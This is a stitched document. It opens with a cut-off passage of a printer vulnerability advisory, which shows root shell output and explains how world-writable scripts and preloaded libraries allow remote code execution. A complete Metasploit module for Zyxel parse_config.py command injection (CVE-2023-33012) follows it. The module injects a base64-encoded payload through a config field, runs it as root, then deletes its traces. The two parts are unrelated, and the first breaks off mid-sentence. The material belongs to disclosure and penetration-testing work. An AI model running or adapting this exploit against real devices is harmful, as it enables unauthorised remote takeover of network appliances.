>> /tmp/gdb_commands.txt echo "quit" >> /tmp/gdb_commands.txt echo "quit" >> /tmp/gdb_commands.txt if [ "$EXE_NAME" = "" ];then if [ -d /work/log/platform/syscallerr/core_files ];then mv "$1" /work/log/platform/syscallerr/core_files/ else mkdir -p /work/log/platform/syscallerr/core_files mv "$1" /work/log/platform/syscallerr/core_files/ fi else if [ -f $EXE_NAME ];then gdb $EXE_NAME "$1" --batch --command=/tmp/gdb_commands.txt 2>&1 elif [ -f $EB2/bin/$EXE_NAME ]; then gdb $EB2/bin/$EXE_NAME "$1" --batch --command=/tmp/gdb_commands.txt 2>&1 elif [ "$EXE_NAME"="(wsgi:webapi)" -o "$EXE_NAME"="(wsgi:webpanel)" -o "$EXE_NAME"="(wsgi:topaccesspy)" ]; then EXE_NAME=/usr/local/ebx/httpd_worker/bin/httpd_worker gdb $EXE_NAME "$1" --batch --command=/tmp/gdb_commands.txt 2>&1 else if [ -d /work/log/platform/syscallerr/core_files ];then mv "$1" /work/log/platform/syscallerr/core_files/ else mkdir -p /work/log/platform/syscallerr/core_files mv "$1" /work/log/platform/syscallerr/core_files/ fi fi fi IFS=${OIFS} bash-4.1# The `/tmp/gdb_commands.txt` gdb script (used by gdb in the `/tmp/backtraceScript.sh` script) can be also overwritten by an attacker to contain gdb commands and get Remote Code Execution. An attacker can change the `/tmp/backtraceScript.sh` to get Remote Code Execution. An attacker can change the `/tmp/gdb_commands.txt` script to get Remote Code Execution. ### Remote Code Execution - Upload of a malicious `/home/SYSROM_SRC/build/common/bin/sapphost.py` program The program `/home/SYSROM_SRC/build/release/bin/sapphost.py` runs as root when the printer starts: bash-4.1# ps auxww|grep python root 3984 5.0 5.3 200160 70944 ? Sl 18:49 0:03 python /home/SYSROM_SRC/build/release/bin/sapphost.py 10000000-0000-0000-0000-500000000000 root 4597 4.5 3.5 144312 47740 ? Sl 18:49 0:02 python /home/SYSROM_SRC/build/release/bin/sapphost.py 10000000-0000-0000-0000-500000000001 root 5193 0.0 0.1 12616 1852 ? S 18:50 0:00 grep python bash-4.1# `/home/SYSROM_SRC/build/release/bin/sapphost.py` is a symbolic link to `/home/SYSROM_SRC/build/common/bin/sapphost.py` and this Python program has insecure permissions, allowing any local user or any remote attacker leveraging the insecure file upload vulnerability to overwrite it: bash-4.1# ls -la /home/SYSROM_SRC/build/release/bin/sapphost.py lrwxrwxrwx 1 root root 32 Mar 15 11:44 /home/SYSROM_SRC/build/release/bin/sapphost.py -> ../../thirdparty/bin/sapphost.py bash-4.1# ls -la /home/SYSROM_SRC/build/thirdparty/bin/sapphost.py lrwxrwxrwx 1 root root 28 Mar 15 11:44 /home/SYSROM_SRC/build/thirdparty/bin/sapphost.py -> ../../common/bin/sapphost.py bash-4.1# ls -la /home/SYSROM_SRC/build/common/bin/sapphost.py -rwxrwxrwx 1 root root 2124 Oct 12 2021 /home/SYSROM_SRC/build/common/bin/sapphost.py An attacker can overwrite this Python code to get Remote Code Execution when the printer starts. ### Remote Code Execution - Upload of malicious libraries When analyzing the processes running in the printers, it appears the `LD_PRELOAD` variable is used to load specific shared libraries: - - `/ramdisk/al/libGetNameInfoInterface.so` - - `/ramdisk/al/libGetAddtInfoInterface.so` We can find the `LD_PRELOAD` variable set by default in programs running in the printers:<b

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Zyxel parse_config.py Command Injection', 'Description' => %q{ This module exploits vulnerabilities in multiple Zyxel devices including the VPN, USG and APT series. The affected firmware versions depend on the device module, see this module's documentation for more details. Note this module was unable to be tested against a real Zyxel device and was tested against a mock environment. If you run into any issues testing this in a real environment we kindly ask you raise an issue in metasploit's github repository: https://github.com/rapid7/metasploit-framework/issues/new/choose }, 'Author' => [ 'SSD Secure Disclosure technical team', # discovery 'jheysel-r7' # Msf module ], 'References' => [ [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-zyxel-vpn-series-pre-auth-remote-command-execution/'], [ 'CVE', '2023-33012'] ], 'License' => MSF_LICENSE, 'Platform' => ['linux', 'unix'], 'Privileged' => true, 'Arch' => [ ARCH_CMD ], 'Targets' => [ [ 'Automatic Target', {}] ], 'DefaultTarget' => 0, 'DisclosureDate' => '2024-01-24', 'Notes' => { 'Stability' => [ CRASH_SAFE, ], 'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ], 'Reliability' => [ ] # This vulnerability can only be exploited once, more info: https://vulncheck.com/blog/zyxel-cve-2023-33012#you-get-one-shot } ) ) register_options( [ OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ]), ] ) end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'ext-js', 'app', 'common', 'zld_product_spec.js') }) return CheckCode::Unknown('No response from /ext-js/app/common/zld_product_spec.js') if res.nil? if res.code == 200 product_match = res.body.match(/ZLDSYSPARM_PRODUCT_NAME1="([^"]*)"/) version_match = res.body.match(/ZLDCONFIG_CLOUD_HELP_VERSION=([\d.]+)/) if product_match && version_match product = product_match[1] version = version_match[1] if (product.starts_with?('USG') && product.include?('W') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.10')) || (product.starts_with?('USG') && !product.include?('W') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.00')) || (product.starts_with?('ATP') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.10')) || (product.starts_with?('VPN') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.00')) return CheckCode::Appears("Product: #{product}, Version: #{version}") else return CheckCode::Safe("Product: #{product}, Version: #{version}") end end end CheckCode::Unknown('Version and product info were unable to be determined.') end def on_new_session(session) super command_output = '' # Get the most recently created GRE tunnel interface, bring it down then delete it to allow for subsequent module runs. if session.type.to_s.eql? 'meterpreter' newest_gre = session.sys.process.execute '/bin/sh', "-c \"ip -d link show type gre | grep -oP '^\\d+: \\K[^@]+' | tail -n 1\"" print_good("Found the most recently created GRE tunnel interface: #{newest_gre}. Going to delete it to allow for subsequent module runs.") command_output = session.sys.process.execute '/bin/sh', "-c \"ifconfig #{newest_gre} down && ip tunnel del #{newest_gre} mode gre && echo success\"" elsif session.type.to_s.eql? 'shell' newest_gre = session.shell_command_token "ip -d link show type gre | grep -oP '^\\d+: \\K[^@]+' | tail -n 1" print_good("Found the most recently created GRE tunnel interface: #{newest_gre}. Going to delete it to allow for subsequent module runs.") command_output = session.shell_command_token "ifconfig #{newest_gre} down && ip tunnel del #{newest_gre} mode gre && echo success" end if command_output.include?('success') print_good('The GRE interface was successfully removed.') else print_warning('The module failed to remove the GRE interface created by this exploit. Subsequent module runs will likely fail unless unless it\'s successfully removed') end end def exploit # Command injection has a 0x14 byte length limit so keep the file name as small as possible. # The length limit is also why we leverage the arbitrary file write -> write our payload to the .qrs file then execute it with the command injection. filename = rand_text_alpha(1) payload_filepath = "#{datastore['WRITABLE_DIR']}/#{filename}.qsr" command = payload.raw command += ' ' command += <<~CMD 2>/var/log/ztplog 1>/var/log/ztplog (sleep 10 && /bin/rm -rf #{payload_filepath}) & CMD command = "echo #{Rex::Text.encode_base64(command)} | base64 -d > #{payload_filepath} ; . #{payload_filepath}" file_write_pload = "option proto vti\n" file_write_pload += "option #{command};exit\n" file_write_pload += "option name 1\n" config = Base64.strict_encode64(file_write_pload) data = { 'config' => config, 'fqdn' => "\x00" } print_status('Attempting to upload the payload via QSR file write...') file_write_res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'parse_config.py'), 'data' => data.to_s }) unless file_write_res && !file_write_res.body.include?('ParseError: 0xC0DE0005') fail_with(Failure::PayloadFailed, 'The response from the target indicates the payload transfer was unsuccessful') end register_files_for_cleanup(payload_filepath) print_good("File write was successful, uploaded: #{payload_filepath}") cmd_injection_pload = "option proto gre\n" cmd_injection_pload += "option name 0\n" cmd_injection_pload += "option ipaddr ;. #{payload_filepath};\n" cmd_injection_pload += "option netmask 24\n" cmd_injection_pload += "option gateway 0\n" cmd_injection_pload += "option localip #{Faker::Internet.private_ip_v4_address}\n" cmd_injection_pload += "option remoteip #{Faker::Internet.private_ip_v4_address}\n" config = Rex::Text.encode_base64(cmd_injection_pload) data = { 'config' => config, 'fqdn' => "\x00" } cmd_injection_res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'parse_config.py'), 'data' => data.to_s }) # If the payload being used is for example cmd/unix/generic and not a payload spawning any kind of handler (bind or reverse) # we can query the /ztp/cgi-bin/dumpztplog.py for the stdout of the command and print it for the user. if payload_instance.connection_type == 'none' cmd_output_res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'dumpztplog.py') }) if cmd_output_res&.body && !cmd_output_res.body.empty? output = cmd_output_res.body.split("</head>\n<body>")[1] output = output.split("</body>\n</html>")[0] output = output.gsub("\n\n ", '') output = output.gsub("[IPC]IPC result: 1\n", '') print_good("Command output: #{output}") else print_error("Could not retrieve the command's stout from /ztp/cgi-bin/dumpztplog.py") end end unless cmd_injection_res && !cmd_injection_res.body.include?('ParseError: 0xC0DE0005') fail_with(Failure::PayloadFailed, 'The response from the target indicates the payload transfer was unsuccessful') end end end </code></pre>